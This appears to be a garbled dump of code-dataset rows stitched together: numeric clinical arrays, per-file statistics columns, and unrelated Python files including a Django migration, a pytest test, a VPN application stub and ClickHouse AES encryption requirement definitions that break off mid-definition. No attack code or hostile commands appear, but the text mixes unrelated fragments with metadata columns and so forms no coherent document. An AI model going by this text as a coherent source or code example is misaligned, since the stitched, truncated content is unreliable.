0.049, 78, 0.44, 0.081, 93, 89, 54, 100, 68, 88, 48, 94, 81, 261, 242, 250, 279, 254, 274, 246, 246, 276, 9.50, 265, 277, 9.50, 263, 71, 71], [30, 1, 5, 1, 2, 1, 45, 119, 2, -0.2, 0.1, -0.1, 18, 4, 94, 0.48, 0.068, 96, 0.48, 0.103, 90, 100, 61, 133, 80, 95, 63, 133, 92, 305, 293, 296, 328, 304, 326, 293, 292, 270, 11.10, 309, 268, 11.10, 308, 92, 91], [31, 1, 5, 1, 1, 2, 47, 122, 2, -0.1, -0.2, -0.2, 15, 1, 95, 0.67, 0.412, 102, 0.60, 0.235, 86, 131, 58, 110, 79, 132, 63, 126, 89, 294, 270, 285, 320, 301, 321, 275, 272, 287, 10.70, 296, 264, 10.60, 295, 89, 89], [31, 1, 2, 2, 2, 1, 40, 111, 1, 0.0, 0.1, 0.0, 19, 5, 98, 0.34, 0.038, 97, 0.39, 0.055, 92, 143, 60, 131, 56, 122, 62, 143, 62, 271, 262, 255, 294, 266, 295, 257, 262, 252, 9.90, 276, 254, 10.00, 277, 83, 82], [33, 1, 3, 2, 2, 1, 32, 98, 2, -0.1, -0.1, -0.1, 13, 1, 95, 0.63, 0.276, 96, 0.57, 0.153, 95, 123, 59, 130, 70, 122, 59, 127, 75, 282, 266, 266, 302, 286, 309, 267, 271, 266, 10.10, 280, 272, 10.30, 285, 90, 89], [31, 1, 6, 2, 2, 1, 41, 113, 1, 0.3, 0.3, 0.3, 15, 1, 64, 0.50, 0.080, 63, 0.61, 0.170, 80, 80, 38, 85, 54, 80, 39, 77, 57, 256, 255, 258, 276, 258, 282, 257, 253, 310, 9.60, 268, 313, 9.70, 270, 68, 68], [61, 1, 5, 1, 2, 1, 43, 116, 1, 0.3, 0.1, 0.0, 19, 5, 88, 0.50, 0.082, 93, 0.42, 0.050, 88, 121, 51, 112, 69, 119, 57, 122, 73, 289, 274, 279, 311, 289, 307, 282, 271, 265, 10.50, 292, 263, 10.50, 292, 85, 85], [65, 2, 5, 1, 2, 1, 38, 108, 1, 0.1, 0.1, 0.1, 14, 1, 93, 0.54, 0.144, 38, 0.37, 0.000, -30, 122, 59, 131, 61, 33, 43, 37, 37, 272, 263, 273, 294, 274, 293, 266, 264, 247, 10.10, 280, 251, 10.10, 280, 82, 82], [56, 1, 5, 1, 2, 1, 49, 125, 1, 0.1, 0.1, 0.0, 22, 6, 76, 0.22, 0.012, 88, 0.18, 0.008, 86, 75, 43, 120, 66, 105, 51, 125, 70, 278, 261, 256, 289, 278, 300, 268, 267, 283, 10.10, 280, 287, 10.30, 287, 74, 81]]
chronic_control_clinical_only = [[46, 1, 5, 1, 2, 1, 34, 101, 2, 0.0, 0.0, 0.0, 15, 3], [49, 2, 5, 1, 2, 1, 49, 123, 2, 0.1, 0.0, 0.0, 19, 5], [56, 2, 5, 1, 2, 2, 27, 92, 1, 0.1, 0.3, 0.0, 18, 4], [49, 1, 5, 1, 2, 1, 42, 113, 2, 0.3, 0.1, 0.1, 17, 4], [45, 1, 5, 1, 1, 1, 46, 119, 1, 0.0, 0.0, -0.1, 17, 4], [32, 1, 5, 1, 2, 1, 41, 113, 2, -0.1, 0.0, -0.1, 19, 6], [38, 1, 5, 1, 1, 1, 32, 98, 2, 0.0, 0.0, -0.1, 17, 4], [39, 1, 5, 1, 2, 2, 41, 111, 1, 0.0, 0.1, -0.1, 17, 4], [32, 1, 5, 1, 1, 1, 33, 100, 2, 0.2, 0.3, 0.2, 19, 5], [30, 1, 5, 1, 2, 1, 40, 111, 1, 0.1, 0.0, 0.0, 16, 3], [30, 1, 5, 1, 2, 1, 45, 119, 2, -0.2, 0.1, -0.1, 18, 4], [31, 1, 5, 1, 1, 2, 47, 122, 2, -0.1, -0.2, -0.2, 15, 1], [31, 1, 2, 2, 2, 1, 40, 111, 1, 0.0, 0.1, 0.0, 19, 5], [33, 1, 3, 2, 2, 1, 32, 98, 2, -0.1, -0.1, -0.1, 13, 1], [31, 1, 6, 2, 2, 1, 41, 113, 1, 0.3, 0.3, 0.3, 15, 1], [61, 1, 5, 1, 2, 1, 43, 116, 1, 0.3, 0.1, 0.0, 19, 5], [65, 2, 5, 1, 2, 1, 38, 108, 1, 0.1, 0.1, 0.1, 14, 1], [56, 1, 5, 1, 2, 1, 49, 125, 1, 0.1, 0.1, 0.0, 22, 6]]
chronic_control_oct_only = [[98, 0.52, 0.149, 99, 0.5, 0.155, 93, 132, 64, 131, 63, 121, 59, 134, 81, 268, 258, 263, 297, 266, 304, 266, 258, 261, 9.9, 274, 267, 10.0, 278, 79, 80], [94, 0.14, 0.009, 99, 0.08, 0.0, 86, 102, 66, 132, 77, 118, 67, 141, 70, 286, 260, 262, 296, 287, 297, 269, 269, 292, 10.3, 286, 289, 10.3, 287, 78, 79], [102, 0.56, 0.122, 109, 0.54, 0.107, 90, 117, 70, 127, 95, 120, 75, 141, 99, 300, 277, 282, 323, 305, 333, 297, 280, 273, 10.8, 300, 281, 11.1, 308, 84, 87], [87, 0.49, 0.026, 89, 0.57, 0.162, 73, 117, 45, 110, 77, 120, 51, 108, 77, 271, 255, 262, 291, 272, 292, 260, 254, 289, 9.9, 275, 267, 9.9, 276, 76, 77], [86, 0.52, 0.148, 84, 0.47, 0.062, 64, 118, 50, 113, 64, 99, 72, 116, 48, 275, 260, 257, 295, 280, 294, 261, 263, 258, 10.0, 278, 258, 10.1, 280, 83, 84], [86, 0.59, 0.215, 91, 0.5, 0.123, 86, 113, 52, 112, 67, 118, 60, 119, 68, 282, 265, 271, 309, 281, 300, 264, 267, 263, 10.3, 286, 263, 10.2, 282, 82, 81], [106, 0.25, 0.024, 104, 0.43, 0.082, 82, 132, 68, 144, 79, 120, 74, 150, 73, 292, 11, 290, 303, 293, 303, 276, 279, 240, 10.5, 290, 244, 10.4, 290, 88, 88], [100, 0.55, 0.185, 101, 0.59, 0.177, 93, 118, 60, 138, 85, 115, 65, 141, 84, 282, 272, 281, 310, 284, 313, 281, 273, 287, 10.5, 290, 288, 10.8, 293, 88, 88], [84, 0.5, 0.107, 87, 0.54, 0.18, 92, 98, 57, 116, 65, 99, 65, 121, 63, 293, 277, 281, 320, 298, 311, 277, 277, 222, 10.3, 286, 220, 10.4, 288, 84, 85], [78, 0.37, 0.049, 78, 0.44, 0.081, 93, 89, 54, 100, 68, 88, 48, 94, 81, 261, 242, 250, 279, 254, 274, 246, 246, 276, 9.5, 265, 277, 9.5, 263, 71, 71], [94, 0.48, 0.068, 96, 0.48, 0.103, 90, 100, 61, 133, 80, 95, 63, 133, 92, 305, 293, 296, 328, 304, 326, 293, 292, 270, 11.1, 309, 268, 11.1, 308, 92, 91], [95, 0.67, 0.412, 102, 0.6, 0.235, 86, 131, 58, 110, 79, 132, 63, 126, 89, 294, 270, 285, 320, 301, 321, 275, 272, 287, 10.7, 296, 264, 10.6, 295, 89, 89], [98, 0.34, 0.038, 97, 0.39, 0.055, 92, 143, 60, 131, 56, 122, 62, 143, 62, 271, 262, 255, 294, 266, 295, 257, 
262, 252, 9.9, 276, 254, 10.0, 277, 83, 82], [95, 0.63, 0.276, 96, 0.57, 0.153, 95, 123, 59, 130, 70, 122, 59, 127, 75, 282, 266, 266, 302, 286, 309, 267, 271, 266, 10.1, 280, 272, 10.3, 285, 90, 89], [64, 0.5, 0.08, 63, 0.61, 0.17, 80, 80, 38, 85, 54, 80, 39, 77, 57, 256, 255, 258, 276, 258, 282, 257, 253, 310, 9.6, 268, 313, 9.7, 270, 68, 68], [88, 0.5, 0.082, 93, 0.42, 0.05, 88, 121, 51, 112, 69, 119, 57, 122, 73, 289, 274, 279, 311, 289, 307, 282, 271, 265, 10.5, 292, 263, 10.5, 292, 85, 85], [93, 0.54, 0.144, 38, 0.37, 0.0, -30, 122, 59, 131, 61, 33, 43, 37, 37, 272, 263, 273, 294, 274, 293, 266, 264, 247, 10.1, 280, 251, 10.1, 280, 82, 82], [76, 0.22, 0.012, 88, 0.18, 0.008, 86, 75, 43, 120, 66, 105, 51, 125, 70, 278, 261, 256, 289, 278, 300, 268, 267, 283, 10.1, 280, 287, 10.3, 287, 74, 81]]
# clinical_only = []
# for i in chronic_control_full_clinical:
# clinical_only.append(i[14:])
# print(clinical_only)
| 692.083333
| 3,825
| 0.542926
| 2,070
| 8,305
| 2.145894
| 0.137198
| 0.027015
| 0.022963
| 0.016209
| 0.70959
| 0.70959
| 0.700585
| 0.683926
| 0.683926
| 0.670419
| 0
| 0.587417
| 0.203853
| 8,305
| 12
| 3,826
| 692.083333
| 0.084392
| 0.075256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
15fb86732c045d614eba1d2b4771f226713ef7a2
| 80
|
py
|
Python
|
qmath/__init__.py
|
qzfzz/qmath
|
868ddb35a485725a42a5049e75785d9aa0bfcf52
|
[
"MIT"
] | null | null | null |
qmath/__init__.py
|
qzfzz/qmath
|
868ddb35a485725a42a5049e75785d9aa0bfcf52
|
[
"MIT"
] | null | null | null |
qmath/__init__.py
|
qzfzz/qmath
|
868ddb35a485725a42a5049e75785d9aa0bfcf52
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
# coding:utf-8
def start():
    """Print a confirmation message showing the package imported correctly."""
    message = 'import successful'
    print(message)
| 11.428571
| 30
| 0.65
| 11
| 80
| 4.727273
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.175
| 80
| 6
| 31
| 13.333333
| 0.757576
| 0.375
| 0
| 0
| 0
| 0
| 0.354167
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
c6035c7f834a672ec65d149077f4469c3bf0dd9b
| 253
|
py
|
Python
|
Python_RPA/Python_RPA_03.py
|
Leeyua-airim/shiny_repo
|
6b3e3021c1bdd85452ed16723a6cb4d98be41f0d
|
[
"MIT"
] | 10
|
2019-07-31T13:06:34.000Z
|
2019-09-05T05:39:49.000Z
|
Python_RPA/Python_RPA_03.py
|
Leeyua-airim/shiny_repo
|
6b3e3021c1bdd85452ed16723a6cb4d98be41f0d
|
[
"MIT"
] | 1
|
2021-04-24T13:18:12.000Z
|
2021-04-24T13:18:12.000Z
|
Python_RPA/Python_RPA_03.py
|
Leeyua-airim/R_AIRIM
|
6b3e3021c1bdd85452ed16723a6cb4d98be41f0d
|
[
"MIT"
] | 11
|
2020-01-01T06:38:37.000Z
|
2021-08-13T13:59:23.000Z
|
"""
user_input = ''
while user_input != 'quit':
user_input = input('Input: ')
print(user_input)
"""
user_input = ''
while user_input != 'quit':
user_input = input('Input: ')
print(user_input)
if user_input == 'exit':
break
| 16.866667
| 33
| 0.588933
| 31
| 253
| 4.516129
| 0.258065
| 0.578571
| 0.2
| 0.257143
| 0.857143
| 0.857143
| 0.857143
| 0.857143
| 0.857143
| 0.857143
| 0
| 0
| 0.241107
| 253
| 14
| 34
| 18.071429
| 0.729167
| 0.391304
| 0
| 0
| 0
| 0
| 0.10274
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d6869031cc7be916778fc2f947e542bf428a2626
| 140
|
py
|
Python
|
diaparser/catalog/__init__.py
|
zoonru/diaparser
|
afae32ca91b84b64c163c749599dfa264e647773
|
[
"MIT"
] | 38
|
2020-10-21T17:43:19.000Z
|
2022-03-01T15:15:25.000Z
|
diaparser/catalog/__init__.py
|
zoonru/diaparser
|
afae32ca91b84b64c163c749599dfa264e647773
|
[
"MIT"
] | 11
|
2020-11-01T14:55:38.000Z
|
2022-02-03T19:51:06.000Z
|
diaparser/catalog/__init__.py
|
zoonru/diaparser
|
afae32ca91b84b64c163c749599dfa264e647773
|
[
"MIT"
] | 7
|
2020-12-18T10:46:51.000Z
|
2022-01-11T22:03:11.000Z
|
from .catalog import select, available_processors, download_processors
__all__ = ['select', 'available_processors', 'download_processors']
| 35
| 70
| 0.814286
| 14
| 140
| 7.571429
| 0.571429
| 0.283019
| 0.471698
| 0.622642
| 0.811321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 140
| 3
| 71
| 46.666667
| 0.828125
| 0
| 0
| 0
| 0
| 0
| 0.321429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d6d763260980d777ad0a1534dc78854e6736cc9e
| 146
|
py
|
Python
|
python/tests/test_fifo_animal_shelter.py
|
kylehoac/data-structures-and-algorithms
|
52326ffcf27b5cc27863a96db86ece585f3d5e33
|
[
"MIT"
] | null | null | null |
python/tests/test_fifo_animal_shelter.py
|
kylehoac/data-structures-and-algorithms
|
52326ffcf27b5cc27863a96db86ece585f3d5e33
|
[
"MIT"
] | 7
|
2021-04-15T23:51:52.000Z
|
2021-04-26T17:18:16.000Z
|
python/tests/test_fifo_animal_shelter.py
|
kylehoac/data-structures-and-algorithms
|
52326ffcf27b5cc27863a96db86ece585f3d5e33
|
[
"MIT"
] | null | null | null |
import pytest
from code_challenges.fifo_animal_shelter.fifo_animal_shelter import AnimalShelter
def test_is_queue():
    """A freshly constructed AnimalShelter should be a truthy object."""
    shelter = AnimalShelter()
    assert shelter
| 20.857143
| 81
| 0.842466
| 19
| 146
| 6.105263
| 0.736842
| 0.172414
| 0.293103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 146
| 6
| 82
| 24.333333
| 0.892308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ba4193d5f62bedc295e892454d0457191eb5738d
| 2,792
|
py
|
Python
|
mat_db/main/migrations/0045_alter_fibreorientation_e_alter_fibreorientation_re_and_more.py
|
tkminek/material_database
|
8661617077192d20e8d9445cd6560bf1266f0582
|
[
"MIT"
] | null | null | null |
mat_db/main/migrations/0045_alter_fibreorientation_e_alter_fibreorientation_re_and_more.py
|
tkminek/material_database
|
8661617077192d20e8d9445cd6560bf1266f0582
|
[
"MIT"
] | null | null | null |
mat_db/main/migrations/0045_alter_fibreorientation_e_alter_fibreorientation_re_and_more.py
|
tkminek/material_database
|
8661617077192d20e8d9445cd6560bf1266f0582
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.2 on 2022-03-11 12:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0044_alter_hosedynamic_dyn_e_min40_and_more'),
]
operations = [
migrations.AlterField(
model_name='fibreorientation',
name='E',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='Re',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='Rm',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='Ru',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='comment',
field=models.CharField(blank=True, max_length=1000),
),
migrations.AlterField(
model_name='fibreorientation',
name='nu',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='rho',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibresncurve',
name='Nf',
field=models.CharField(max_length=20000),
),
migrations.AlterField(
model_name='fibresncurve',
name='Sa',
field=models.CharField(max_length=20000),
),
migrations.AlterField(
model_name='fibrestaticcurve',
name='K',
field=models.FloatField(max_length=200),
),
migrations.AlterField(
model_name='fibrestaticcurve',
name='n',
field=models.FloatField(max_length=200),
),
migrations.AlterField(
model_name='rubbertemp',
name='E',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='Re',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='Rm',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='Ru',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='nu',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='rho',
field=models.FloatField(),
),
]
| 28.20202
| 64
| 0.517908
| 220
| 2,792
| 6.440909
| 0.259091
| 0.239944
| 0.299929
| 0.347918
| 0.846154
| 0.8271
| 0.705716
| 0.67043
| 0.67043
| 0.176429
| 0
| 0.02319
| 0.366762
| 2,792
| 98
| 65
| 28.489796
| 0.778281
| 0.016117
| 0
| 0.858696
| 1
| 0
| 0.113661
| 0.015665
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01087
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba80ab7453db29bf1186939d5d99cb658f19828b
| 163
|
py
|
Python
|
xv_leak_tools/test_components/vpn_application/android/android_vpn_application.py
|
UAEKondaya1/expressvpn_leak_testing
|
9e4cee899ac04f7820ac351fa55efdc0c01370ba
|
[
"MIT"
] | 219
|
2017-12-12T09:42:46.000Z
|
2022-03-13T08:25:13.000Z
|
xv_leak_tools/test_components/vpn_application/android/android_vpn_application.py
|
UAEKondaya1/expressvpn_leak_testing
|
9e4cee899ac04f7820ac351fa55efdc0c01370ba
|
[
"MIT"
] | 11
|
2017-12-14T08:14:51.000Z
|
2021-08-09T18:37:45.000Z
|
xv_leak_tools/test_components/vpn_application/android/android_vpn_application.py
|
UAEKondaya1/expressvpn_leak_testing
|
9e4cee899ac04f7820ac351fa55efdc0c01370ba
|
[
"MIT"
] | 45
|
2017-12-14T07:26:36.000Z
|
2022-03-11T09:36:56.000Z
|
from xv_leak_tools.test_components.vpn_application.mobile_vpn_application import MobileVPNApplication
class AndroidVPNApplication(MobileVPNApplication):
pass
| 32.6
| 101
| 0.889571
| 17
| 163
| 8.176471
| 0.823529
| 0.201439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07362
| 163
| 4
| 102
| 40.75
| 0.92053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
bae8b5cc3c116e7f189a9434f34eaee16d539030
| 138,997
|
py
|
Python
|
tests/testflows/aes_encryption/requirements/requirements.py
|
jorisgio/ClickHouse
|
9ec78855cded9eb5a84e7fed300ff7f8a4b497c2
|
[
"Apache-2.0"
] | 1
|
2020-11-16T03:55:59.000Z
|
2020-11-16T03:55:59.000Z
|
tests/testflows/aes_encryption/requirements/requirements.py
|
jorisgio/ClickHouse
|
9ec78855cded9eb5a84e7fed300ff7f8a4b497c2
|
[
"Apache-2.0"
] | null | null | null |
tests/testflows/aes_encryption/requirements/requirements.py
|
jorisgio/ClickHouse
|
9ec78855cded9eb5a84e7fed300ff7f8a4b497c2
|
[
"Apache-2.0"
] | null | null | null |
# These requirements were auto generated
# from software requirements specification (SRS)
# document by TestFlows v1.6.200731.1222107.
# Do not edit by hand but re-generate instead
# using 'tfs requirements generate' command.
from testflows.core import Requirement
RQ_SRS008_AES_Functions = Requirement(
name='RQ.SRS008.AES.Functions',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support [AES] encryption functions to encrypt and decrypt data.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support [AES] encryption functions compatible with [MySQL 5.7].\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_Dictionaries = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.Dictionaries',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed on remote\n'
'[MySQL] servers using [MySQL Dictionary].\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_Engine_Database_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.Engine.Database.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed using [MySQL Database Engine],\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_Engine_Table_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.Engine.Table.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed using [MySQL Table Engine].\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_TableFunction_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.TableFunction.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed using [MySQL Table Function].\n'
),
link=None
)
RQ_SRS008_AES_Functions_DifferentModes = Requirement(
name='RQ.SRS008.AES.Functions.DifferentModes',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL allow different modes to be supported in a single SQL statement\n'
'using explicit function parameters.\n'
),
link=None
)
RQ_SRS008_AES_Functions_DataFromMultipleSources = Requirement(
name='RQ.SRS008.AES.Functions.DataFromMultipleSources',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support handling encryption and decryption of data from multiple sources\n'
'in the `SELECT` statement, including [ClickHouse] [MergeTree] table as well as [MySQL Dictionary],\n'
'[MySQL Database Engine], [MySQL Table Engine], and [MySQL Table Function]\n'
'with possibly different encryption schemes.\n'
),
link=None
)
RQ_SRS008_AES_Functions_SuppressOutputOfSensitiveValues = Requirement(
name='RQ.SRS008.AES.Functions.SuppressOutputOfSensitiveValues',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL suppress output of [AES] `string` and `key` parameters to the system log,\n'
'error log, and `query_log` table to prevent leakage of sensitive values.\n'
),
link=None
)
RQ_SRS008_AES_Functions_InvalidParameters = Requirement(
name='RQ.SRS008.AES.Functions.InvalidParameters',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when parameters are invalid.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_Key = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return garbage for mismatched keys.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_IV = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.IV',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return garbage for mismatched initialization vector for the modes that use it.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_AAD = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.AAD',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return garbage for mismatched additional authentication data for the modes that use it.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_Mode = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error or garbage for mismatched mode.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Check_Performance = Requirement(
name='RQ.SRS008.AES.Functions.Check.Performance',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Performance of [AES] encryption functions SHALL be measured.\n'
),
link=None
)
RQ_SRS008_AES_Function_Check_Performance_BestCase = Requirement(
name='RQ.SRS008.AES.Function.Check.Performance.BestCase',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Performance of [AES] encryption functions SHALL be checked for the best case\n'
'scenario where there is one key, one initialization vector, and one large stream of data.\n'
),
link=None
)
RQ_SRS008_AES_Function_Check_Performance_WorstCase = Requirement(
name='RQ.SRS008.AES.Function.Check.Performance.WorstCase',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Performance of [AES] encryption functions SHALL be checked for the worst case\n'
'where there are `N` keys, `N` initialization vectors and `N` very small streams of data.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Check_Compression = Requirement(
name='RQ.SRS008.AES.Functions.Check.Compression',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Effect of [AES] encryption on column compression SHALL be measured.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Check_Compression_LowCardinality = Requirement(
name='RQ.SRS008.AES.Functions.Check.Compression.LowCardinality',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Effect of [AES] encryption on the compression of a column with [LowCardinality] data type\n'
'SHALL be measured.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function = Requirement(
name='RQ.SRS008.AES.Encrypt.Function',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes_encrypt` function to encrypt data using [AES].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Syntax = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Syntax',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support the following syntax for the `aes_encrypt` function\n'
'\n'
'```sql\n'
'aes_encrypt(plaintext, key, mode, [iv, aad])\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_NIST_TestVectors = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.NIST.TestVectors',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] `aes_encrypt` function output SHALL produce output that matches [NIST test vectors].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_PlainText = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.PlainText',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `plaintext` accepting any data type as\n'
'the first parameter to the `aes_encrypt` function that SHALL specify the data to be encrypted.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Key = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
'as the second parameter to the `aes_encrypt` function that SHALL specify the encryption key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
'to the `aes_encrypt` function that SHALL specify encryption key length and block encryption mode.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.ValuesFormat',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
'of the `aes_encrypt` function where\n'
'the `key_length` SHALL specifies the length of the key and SHALL accept\n'
'`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB] as well as\n'
'[CTR] and [GCM] as the values. For example, `aes-256-ofb`.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
